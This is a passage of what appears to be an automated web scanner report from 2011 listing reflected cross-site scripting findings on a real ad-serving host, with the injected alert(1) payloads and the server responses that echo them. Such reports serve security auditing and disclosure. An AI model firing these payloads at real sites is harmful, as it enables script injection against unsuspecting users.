HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:15 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb8e"><script>alert(1)</script>2506b43238c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:22 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11226"><script>alert(1)</script>50c898679b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca1c1"-alert(1)-"203e0c80030 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728ca1c1"-alert(1)-"203e0c80030";
4.338. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/11819507567@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3078f"-alert(1)-"5f07425cbb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&3078f"-alert(1)-"5f07425cbb4=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af4c"><script>alert(1)</script>b80795c01a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:42 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89f1b"><script>alert(1)</script>7b3269718e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf58f"><script>alert(1)</script>d6fa7baad79 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:13 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 324 Content-Type: text/html
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98145"-alert(1)-"bde28f2b39e was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:40 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_30098145"-alert(1)-"bde28f2b39e";
4.343. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/11824141209@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12cb8"-alert(1)-"b52dcf6ee5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&12cb8"-alert(1)-"b52dcf6ee5d=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4479"><script>alert(1)</script>e92a94cc08f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:42 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 332 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b208b"><script>alert(1)</script>a1467d27b2b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac744"><script>alert(1)</script>72c75e8abaa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:08 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_160 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a24a5"-alert(1)-"0b090863dfc was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_160 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:40 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_160a24a5"-alert(1)-"0b090863dfc";
4.348. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/11940003036@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861ee"-alert(1)-"97f1109ca7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_160&861ee"-alert(1)-"97f1109ca7d=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76e2e"><script>alert(1)</script>d6d52f497d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:16 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f784"><script>alert(1)</script>ebe5c348809 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:22 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa3cd"><script>alert(1)</script>938a4db3496 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:30 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e64e"-alert(1)-"ec42b83e34b was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3003e64e"-alert(1)-"ec42b83e34b";
4.353. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/12000985820@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 796f4"-alert(1)-"69e83c326b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&796f4"-alert(1)-"69e83c326b1=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc6a0"><script>alert(1)</script>b7139dead4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:16 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d35df"><script>alert(1)</script>5db05569f10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:22 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e3d8"><script>alert(1)</script>d4d7bda2c35 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:33 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16c23"-alert(1)-"dcc629a6211 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_72816c23"-alert(1)-"dcc629a6211";
4.358. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/12037650882@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d922"-alert(1)-"b61cd2ce280 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&9d922"-alert(1)-"b61cd2ce280=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 909dd"><script>alert(1)</script>b9fcaaeb6dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7be0"><script>alert(1)</script>a8026b634ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:51 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e37b"><script>alert(1)</script>2414a8aeb16 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:17 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccdf2"-alert(1)-"1e73f836517 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:42 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728ccdf2"-alert(1)-"1e73f836517";
4.363. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/1334085935@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce89c"-alert(1)-"0f77d02c603 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:44 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&ce89c"-alert(1)-"0f77d02c603=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77a4b"><script>alert(1)</script>888645203e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:44 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff67"><script>alert(1)</script>487596c05e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51f5"><script>alert(1)</script>0795f99bb08 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1466a"-alert(1)-"b3b7c22333a was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3001466a"-alert(1)-"b3b7c22333a";
4.368. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/1394936567@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b11b1"-alert(1)-"34cc5b8ecc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:42 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2485 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&b11b1"-alert(1)-"34cc5b8ecc=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1160"><script>alert(1)</script>c85ff46a2ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
